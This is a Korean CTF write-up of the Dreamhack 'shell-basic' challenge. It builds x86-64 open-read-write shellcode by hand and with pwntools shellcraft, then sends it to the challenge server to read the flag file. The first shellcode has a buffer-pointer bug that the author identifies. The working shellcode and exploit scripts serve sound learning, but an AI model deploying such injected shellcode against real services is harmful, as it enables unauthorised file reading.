
[Dreamhack] shell-basic


by koharin 2024. 1. 10. 19:01


풀이 1

filename을 16진수로 구하기

section .data
    ; NUL-terminated path string. This file exists only so that objdump can
    ; show the byte values of the path (see the .data dump below).
    filename db '/home/shell_basic/flag_name_is_loooooong', 0
    mode     dq 0 ; O_RDONLY = 0; kept for reference, the shellcode passes 0 in rsi directly
  • 먼저 asm 파일에 위와 같이 filename을 적는 어셈블리 코드를 작성한다.
nasm -f elf64 shell_basic.asm # assemble for x86-64 ELF; produces shell_basic.o
objcopy --dump-section .text=shell_basic.bin shell_basic.o # copies the raw bytes of one section into shell_basic.bin (this is not a linked executable); note this source defines only .data, so the section to dump for it is .data, not .text
$ objdump -D shell_basic.o # disassemble every section; the .data listing below shows the path bytes
shell_basic.o:     file format elf64-x86-64

Disassembly of section .data:

0000000000000000 <filename>:
   0:   2f                      (bad)  
   1:   68 6f 6d 65 2f          pushq  $0x2f656d6f
   6:   73 68                   jae    70 <mode+0x47>
   8:   65 6c                   gs insb (%dx),%es:(%rdi)
   a:   6c                      insb   (%dx),%es:(%rdi)
   b:   5f                      pop    %rdi
   c:   62 61                   (bad)  
   e:   73 69                   jae    79 <mode+0x50>
  10:   63 2f                   movslq (%rdi),%ebp
  12:   66 6c                   data16 insb (%dx),%es:(%rdi)
  14:   61                      (bad)  
  15:   67 5f                   addr32 pop %rdi
  17:   6e                      outsb  %ds:(%rsi),(%dx)
  18:   61                      (bad)  
  19:   6d                      insl   (%dx),%es:(%rdi)
  1a:   65 5f                   gs pop %rdi
  1c:   69 73 5f 6c 6f 6f 6f    imul   $0x6f6f6f6c,0x5f(%rbx),%esi
  23:   6f                      outsl  %ds:(%rsi),(%dx)
  24:   6f                      outsl  %ds:(%rsi),(%dx)
  25:   6f                      outsl  %ds:(%rsi),(%dx)
  26:   6e                      outsb  %ds:(%rsi),(%dx)
  27:   67 00                   add    %al,(%eax)
  • objdump 명령어로 filename의 16진수 형태를 확인할 수 있다. 스택에 push할 때는 little endian이므로 문자열 끝에서부터 8바이트씩 \x67\x6e\x6f ~ \x68\x2f 순서로 filename 값을 구한다.
  • 구한 filename을 open의 인자로 넣어줘야 한다.
nasm -f elf64 shellcode.asm # assemble the shellcode source below into shellcode.o
section .text
    global _start

_start:
    ; Build the NUL-terminated path on the stack 8 bytes at a time, last chunk
    ; first: each immediate is one little-endian 8-byte slice of
    ; "/home/shell_basic/flag_name_is_loooooong" read off the objdump above.
    push 0x0 ; 8 zero bytes: the string terminator
    mov rax, 0x676e6f6f6f6f6f6f
    push rax
    mov rax, 0x6c5f73695f656d61
    push rax
    mov rax, 0x6e5f67616c662f63
    push rax
    mov rax, 0x697361625f6c6c65
    push rax
    mov rax, 0x68732f656d6f682f
    push rax

    ; open(filename, O_RDONLY)
    mov rdi, rsp ; rdi = pointer to the path just pushed
    xor rsi, rsi ; rsi = 0 = O_RDONLY
    xor rax, rax ; redundant: the next mov overwrites rax anyway
    mov rax, 0x2 ; SYS_open
    syscall

    ; read(fd, buf, 0x30)
    mov rdi, rax ; fd returned by open()
    sub rsi, 0x30 ; BUG: rsi is still 0 here, so buf becomes 0 - 0x30, not an
                  ; address on the stack; the kernel rejects that pointer, read()
                  ; fails, and the program falls through to exit(0) below. A stack
                  ; buffer needs to be derived from rsp (as the shellcraft listing does).
    mov rdx, 0x30 ; rdx = 0x30 bytes
    mov rax, 0x0 ; SYS_read
    syscall

    ; write(1, buf, 0x30): rsi/rdx still hold buf and the length from read()
    mov rdi, 1 ; rdi = 1 = stdout
    mov rax, 0x1 ; SYS_write
    syscall

    ; exit(0)
    xor rdi, rdi 
    mov rax, 0x3c ; SYS_exit
    syscall
objdump -D shellcode.o # disassemble the object; the hex column is what the payload below is transcribed from

shellcode.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:   6a 00                   pushq  $0x0
   2:   48 b8 6f 6f 6f 6f 6f    movabs $0x676e6f6f6f6f6f6f,%rax
   9:   6f 6e 67 
   c:   50                      push   %rax
   d:   48 b8 61 6d 65 5f 69    movabs $0x6c5f73695f656d61,%rax
  14:   73 5f 6c 
  17:   50                      push   %rax
  18:   48 b8 63 2f 66 6c 61    movabs $0x6e5f67616c662f63,%rax
  1f:   67 5f 6e 
  22:   50                      push   %rax
  23:   48 b8 65 6c 6c 5f 62    movabs $0x697361625f6c6c65,%rax
  2a:   61 73 69 
  2d:   50                      push   %rax
  2e:   48 b8 2f 68 6f 6d 65    movabs $0x68732f656d6f682f,%rax
  35:   2f 73 68 
  38:   50                      push   %rax
  39:   48 89 e7                mov    %rsp,%rdi
  3c:   48 31 f6                xor    %rsi,%rsi
  3f:   48 31 c0                xor    %rax,%rax
  42:   b8 02 00 00 00          mov    $0x2,%eax
  47:   0f 05                   syscall 
  49:   48 89 c7                mov    %rax,%rdi
  4c:   48 83 ee 30             sub    $0x30,%rsi
  50:   ba 30 00 00 00          mov    $0x30,%edx
  55:   b8 00 00 00 00          mov    $0x0,%eax
  5a:   0f 05                   syscall 
  5c:   bf 01 00 00 00          mov    $0x1,%edi
  61:   b8 01 00 00 00          mov    $0x1,%eax
  66:   0f 05                   syscall 
  68:   48 31 ff                xor    %rdi,%rdi
  6b:   b8 3c 00 00 00          mov    $0x3c,%eax
  70:   0f 05                   syscall
  • objdump 출력의 16진수를 \x6a부터 마지막 \x05까지 차례로 이어 붙이면 shellcode가 완성된다.
#!/usr/bin/python3

from pwn import *

# Solution 1: send the hand-transcribed machine code to the challenge service.
context.log_level = 'debug'
p = remote('host3.dreamhack.games', 11531)

context.arch = 'amd64'

# Raw bytes copied in order from `objdump -D shellcode.o` above
# (open -> read -> write -> exit). The transcription matches the listing, so
# it also inherits the listing's `sub rsi, 0x30` defect: rsi is 0 before the
# subtraction, so read() receives an invalid buffer pointer.
payload = b"\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xc0\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"

# sendline appends '\n' after the payload; the payload ends with exit(0), so
# the extra byte is never reached if the service runs the input in place.
p.sendlineafter('shellcode: ', payload)

print(p.recv())

쉘코드가 잘못되었는지 그냥 exit됨.. → 원인은 read()의 buf 인자로 보인다: `xor rsi, rsi` 다음의 `sub rsi, 0x30`은 rsi를 rsp 기준이 아니라 0에서 0x30을 뺀 값으로 만들어 buf가 유효한 스택 주소가 아니게 되고, read/write가 실패한 채 exit(0)만 실행된다 (풀이 2의 shellcraft 출력은 `mov rsi, rsp`로 buf를 지정한다).

 

풀이 2: pwntools의 shellcraft를 이용하여 shellcode 구성

#!/usr/bin/python3
from pwn import *

# Solution 2: let pwntools' shellcraft emit the open/read/write sequence.
context.log_level = 'debug'
p = remote('host3.dreamhack.games', 11531)

context.arch = 'amd64'  # target for shellcraft/asm; set before generating code
flag = '/home/shell_basic/flag_name_is_loooooong'

# open('/home/shell_basic/flag_name_is_loooooong')
shellcode = shellcraft.open(flag)
# read(fd, buf, 0x30): fd is the value open() left in rax, buf is the stack top
shellcode += shellcraft.read('rax', 'rsp', 0x30) 
# write(stdout, buf, 0x30)
shellcode += shellcraft.write(1, 'rsp', 0x30)

# Assemble the generated assembly text into machine code (see listing below)
shellcode = asm(shellcode)

# No exit() is appended, so after the write the CPU runs past the end of the
# shellcode into whatever follows it (the '\n' that sendline adds); the flag
# has already been written by then.
p.sendlineafter('shellcode: ', shellcode)
print(p.recv())
.section .shellcode,"awx"
    .global _start
    .global __start
    _start:
    __start:
    .intel_syntax noprefix
    .p2align 0
        /* Assembly text generated by shellcraft for solution 2, before asm() encodes it. */
        /* open(file='/home/shell_basic/flag_name_is_loooooong', oflag=0, mode=0) */
        /* push b'/home/shell_basic/flag_name_is_loooooong\\x00' */
        /* push 1 then decrement the byte at rsp: yields the 0 terminator without a literal 0 byte in the encoding */
        push 1
        dec byte ptr [rsp]
        mov rax, 0x676e6f6f6f6f6f6f
        push rax
        mov rax, 0x6c5f73695f656d61
        push rax
        mov rax, 0x6e5f67616c662f63
        push rax
        mov rax, 0x697361625f6c6c65
        push rax
        mov rax, 0x68732f656d6f682f
        push rax
        mov rdi, rsp
        xor edx, edx /* 0 */
        xor esi, esi /* 0 */
        /* call open() */
        push 2 /* 2 */
        pop rax
        syscall
        /* call read('rax', 'rsp', 0x30) */
        mov rdi, rax
        xor eax, eax /* SYS_read */
        push 0x30
        pop rdx
        mov rsi, rsp /* buf = stack top: the memory the path was pushed into, reused now that open() is done */
        syscall
        /* write(fd=1, buf='rsp', n=0x30) */
        push 1
        pop rdi
        push 0x30
        pop rdx
        mov rsi, rsp
        /* call write() */
        push 1 /* 1 */
        pop rax
        syscall
        /* no exit syscall follows: execution continues into whatever bytes come after the shellcode */

 

위와 같은 파이썬 exploit 코드를 실행하면, shellcraft로 구성한 쉘코드가 어셈블리 코드 형태로 만들어지고, 이를 asm()으로 기계어로 변환한 결과가 문제의 shellcode: 이후의 입력으로 전달되어 flag 파일을 열고 flag를 읽을 수 있다.

 

